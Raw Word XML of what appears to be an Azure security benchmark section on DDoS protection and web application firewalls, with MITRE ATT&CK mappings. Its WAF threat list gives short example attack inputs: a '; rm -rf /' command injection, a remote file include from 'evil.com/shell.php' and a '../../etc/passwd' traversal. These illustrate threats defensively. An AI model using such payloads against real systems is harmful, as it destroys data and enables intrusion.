    <w:p w14:paraId="75CB3398" w14:textId="2EFC888E" w:rsidR="00D76C03" w:rsidRDefault="00D76C03" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A38DA9" w14:textId="00218558" w:rsidR="008A6111" w:rsidRPr="00E53977" w:rsidRDefault="008A6111" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1498 - Network Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D93A5" w14:textId="64E39420" w:rsidR="00B667B2" w:rsidRDefault="00B667B2" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Resource Development (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FBF41" w14:textId="3AF25FF7" w:rsidR="008A6111" w:rsidRPr="00E53977" w:rsidRDefault="008A6111" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1584 - Compromise Infrastructure</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2E3AD40F" w14:textId="62EAD364" w:rsidR="008A6111" w:rsidRDefault="008A6111" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy DDoS protection at both network and application layers to defend against volumetric and application-specific attacks. Azure provides multiple tiers of protection: DDoS Network Protection for comprehensive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> coverage with rapid response support, DDoS IP Protection for cost-effective protection of individual IPs, and application layer protection through WAF. Configure monitoring and alerts to validate protection effectiveness and ensure application resilience during attacks</w:t>
      </w:r>
      <w:r w:rsidR="00B571CC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5C04B" w14:textId="694F771D" w:rsidR="008D6543" w:rsidRPr="00E53977" w:rsidRDefault="008D6543" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Deploy network layer DDoS protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1D9E3" w14:textId="689D4DBF" w:rsidR="005552D0" w:rsidRDefault="005552D0" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose between DDoS Network Protection for workload deployments requiring comprehensive </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> coverage and rapid response support for attack investigation and post-attack analysis, or DDoS IP Protection for cost-effective protection of a limited number of IPs without rapid response support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608A9EB" w14:textId="5CCDF9EE" w:rsidR="008A6111" w:rsidRPr="008A6111" w:rsidRDefault="008A6111" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>application layer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> DDoS protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2795E" w14:textId="1EC24A75" w:rsidR="00337E8E" w:rsidRPr="00E53977" w:rsidRDefault="00337E8E" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enable DDoS protection on Azure Web Application Firewall (WAF), Application Gateway, or Azure Front Door to defend against application layer (Layer 7) attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45793696" w14:textId="1AEBE4E4" w:rsidR="00CC5CE8" w:rsidRPr="008A6111" w:rsidRDefault="00CC5CE8" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A6111">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure monitoring and alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D052D7" w14:textId="4589171A" w:rsidR="009356A3" w:rsidRPr="00E53977" w:rsidRDefault="00B0403B" w:rsidP="00BA39EE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure alerts and monitor metrics and logs from the DDoS protection service and your applications to ensure protection effectiveness, application resilience, and desired performance during and after attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E6752" w14:textId="4864E094" w:rsidR="00AA61B0" w:rsidRPr="00355CC6" w:rsidRDefault="0079318A" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc242449471"/>
      <w:r w:rsidRPr="00355CC6">
        <w:lastRenderedPageBreak/>
        <w:t>NS-6: Deploy web application firewall</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="404E6ED3" w14:textId="2FE7F8AD" w:rsidR="009356A3" w:rsidRPr="00E53977" w:rsidRDefault="009356A3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A0EED7" w14:textId="76F69834" w:rsidR="009356A3" w:rsidRPr="00E53977" w:rsidRDefault="009356A3" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Injection attacks (e.g., SQL injection, command injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3386D2" w14:textId="396968D3" w:rsidR="00860062" w:rsidRPr="00E53977" w:rsidRDefault="00860062" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>, ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> rm -rf / via a form field).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2AFD90" w14:textId="3442DFDB" w:rsidR="00860062" w:rsidRPr="00E53977" w:rsidRDefault="00860062" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>HTTP protocol violations and malformed requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61750D5E" w14:textId="3A212A52" w:rsidR="00B71BF0" w:rsidRPr="00E53977" w:rsidRDefault="00B71BF0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Bot-driven attacks (e.g., credential stuffing, scraping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F1B8D" w14:textId="3C835EB4" w:rsidR="001B0CF7" w:rsidRPr="00E53977" w:rsidRDefault="001B0CF7" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>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rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Application-specific exploits (e.g., remote file Inclusion, local file inclusion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23465EAE" w14:textId="7A8129E7" w:rsidR="00FF74A6" w:rsidRDefault="00FF74A6" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Attackers exploit vulnerabilities to include malicious files (e.g., include 'http://evil.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>') or access local server files (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>e.g., ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>/../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>/passwd) via manipulated URL parameters or form inputs, enabling code execution or data exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23740116" w14:textId="77777777" w:rsidR="00B571CC" w:rsidRPr="00E53977" w:rsidRDefault="00B571CC" w:rsidP="00B571CC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5938F31F" w14:textId="768DDF8D" w:rsidR="00193936" w:rsidRPr="00E53977" w:rsidRDefault="00193936" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02D4D3" w14:textId="591973EA" w:rsidR="00193936" w:rsidRDefault="00193936" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CA72A" w14:textId="638306AA" w:rsidR="00B571CC" w:rsidRPr="00E53977" w:rsidRDefault="00B571CC" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571CC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1190 - Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31676B6E" w14:textId="07E2F481" w:rsidR="00193936" w:rsidRDefault="00193936" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35191ED9" w14:textId="65F3ED80" w:rsidR="00B571CC" w:rsidRPr="00E53977" w:rsidRDefault="00B571CC" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571CC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1059 - Command and Scripting Interpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14296D4F" w14:textId="4FFAE3D2" w:rsidR="00193936" w:rsidRDefault="00193936" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125DF93" w14:textId="24904BAF" w:rsidR="00B571CC" w:rsidRPr="00E53977" w:rsidRDefault="00B571CC" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571CC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1539 - Steal Web Session Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED6AF5" w14:textId="7723F23F" w:rsidR="00132074" w:rsidRDefault="00132074" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3B866" w14:textId="3E6EF396" w:rsidR="00B571CC" w:rsidRPr="00E53977" w:rsidRDefault="00B571CC" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B571CC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>T1110 - Brute Force</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699A9701" w:rsidR="00F20CC8" w:rsidRPr="00E53977" w:rsidRDefault="00F20CC8" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Enable web application firewall (WAF) capabilities in Azure Application Gateway, Azure Front Door, or Azure Content Delivery Network (CDN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C04A1E0" w14:textId="35F79E5C" w:rsidR="002A0DC0" w:rsidRPr="00F77A46" w:rsidRDefault="002A0DC0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77A46">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Select the appropriate WAF service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50F9B6" w14:textId="71C749D6" w:rsidR="002A0DC0" w:rsidRDefault="002A0DC0" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose Azure Application Gateway for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VNet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>-hosted applications, Azure Front Door for global edge delivery, or Azure CDN for content-heavy workloads based on application requirements and architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C44A2AB" w14:textId="01E4E408" w:rsidR="00F77A46" w:rsidRPr="00F77A46" w:rsidRDefault="00F77A46" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77A46">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Configure WAF policies with built-in and custom rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D40E55" w14:textId="31537891" w:rsidR="00A75C93" w:rsidRPr="00E53977" w:rsidRDefault="00521DFF" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>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76F38ACA" w:rsidR="00624774" w:rsidRPr="00F77A46" w:rsidRDefault="00624774" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77A46">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Set WAF policy mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD3F00" w14:textId="3ABDBE58" w:rsidR="00A75C93" w:rsidRPr="00E53977" w:rsidRDefault="00A75C93" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>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3A5E46AF" w:rsidR="00A56365" w:rsidRPr="00F77A46" w:rsidRDefault="00A56365" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77A46">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Associate WAF policy with service endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489A541" w14:textId="5E348837" w:rsidR="00A56365" w:rsidRDefault="00A56365" w:rsidP="00355CC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>Associate the WAF policy with the Application Gateway, Front Door, or CDN endpoint to ensure all HTTP/HTTPS traffic is routed through WAF for inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784E302A" w14:textId="77777777" w:rsidR="00F77A46" w:rsidRPr="00E53977" w:rsidRDefault="00F77A46" w:rsidP="00F77A46">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
